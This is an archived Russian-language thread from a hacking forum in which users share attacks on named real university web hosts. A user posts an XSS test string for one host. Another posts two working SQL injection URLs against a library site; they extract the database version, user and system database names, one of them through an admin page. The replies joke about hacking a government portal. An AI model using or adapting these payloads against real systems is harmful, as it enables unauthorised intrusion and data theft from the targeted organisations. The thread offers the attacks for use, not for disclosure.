Просмотр полной версии : xss уязвимость
Нашел на сайте http://abc.vvsu.ru/ xss-уязвимость,
при вводе
">alert('xss')"
Я бы помог. Но мало того, что это .ru, это еще и гос сайт. с ' очевидно что скуля. А с хсской куча векторов но все они клиентские. От угона куков до хека тачки
leksadin
05.04.2017, 00:39
[QUOTE="qwebdev"]
qwebdev said:
↑ (https://antichat.live/posts/4067353/)
Нашел на сайте
http://abc.vvsu.ru/
xss-уязвимость,
при вводе
">alert('xss')"alert('xss')"
Code:
http://lib.vvsu.ru/russian/index.php?id=61&id_exhibition=156+union+select+1,concat_ws(0x3a,ve rsion(),database(),user()),3,4,5,6+--+
но это уже совсем другая история
Code:
http://lib.vvsu.ru//admin/news.asp?idyear=999999.9+union+all+select+null,nul l,null,(select+char(126)%2bchar(39)%2bname%2bchar( 39)%2bchar(126)+from+master..sysdatabases+where+db id=1),null,null,null,null--
а вот это твоя история
Gorev said:
↑ (https://antichat.live/posts/4068795/)
Code:
http://lib.vvsu.ru/russian/index.php?id=61&id_exhibition=156+union+select+1,concat_ws(0x3a,ve rsion(),database(),user()),3,4,5,6+--+
но это уже совсем другая история
Code:
http://lib.vvsu.ru//admin/news.asp?idyear=999999.9+union+all+select+null,nul l,null,(select+char(126)%2bchar(39)%2bname%2bchar( 39)%2bchar(126)+from+master..sysdatabases+where+db id=1),null,null,null,null--
а вот это твоя история
Да ВЫ бессмерты, Сударь. Хекать так спокойно гос портал, да ещё и рушный.
SooLFaa said:
↑ (https://antichat.live/posts/4068900/)
Да ВЫ бессмерты, Сударь. Хекать так спокойно гос портал, да ещё и рушный.
Отнюдь, милорд, я лишь указал направление, вектор так сказать...
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot